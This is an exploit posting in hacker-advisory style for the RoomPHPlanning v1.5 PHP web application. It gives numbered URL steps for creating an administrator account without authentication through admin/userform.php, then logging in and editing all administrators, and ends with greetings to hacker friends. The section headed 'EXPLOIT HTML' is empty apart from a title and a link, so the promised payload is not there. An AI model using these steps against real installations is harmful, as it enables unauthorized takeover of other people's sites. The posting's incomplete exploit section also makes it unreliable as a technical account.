###########################################
{+} RoomPHPlanning v1.5 remote Arbitrary Add Admin Users Vulnerability
{+} Script download :http://www.beaussier.com/roomphplanning/telecharge.php
{+} Founded by : Stack
{+} Greetz : All friends & muslims HaCkeRs...
###########################################
DESCRIPTION:
RoomPHPlanning is vulnerable to add user whit go to link [see down]
in colon Nom write any name and in colon login whrite your adress email after password
and the colon priviléges is adminstrator after click [enregistrer ]
Vulnerability:
go to this link for add admin user
1 : http://localhost/path/admin/userform.php
go this link for login in
2 : http://localhost/path/login.php
after login in go to admin link
3 : http://localhost/path/admin/
for see all administrator & edit it
4 : http://localhost/path/admin/?user=1
after execute the command for add user or for login in the page is not changed
it's necessary go to second link 1 2 3 4
EXPLOIT HTML :
-------------------------------------------------------------------------------------
RoomPHPlanning add Admin user
-------------------------------------------------------------------------------------
GREETZ: http://real-hack.com
-----------------------------------------------------------------------------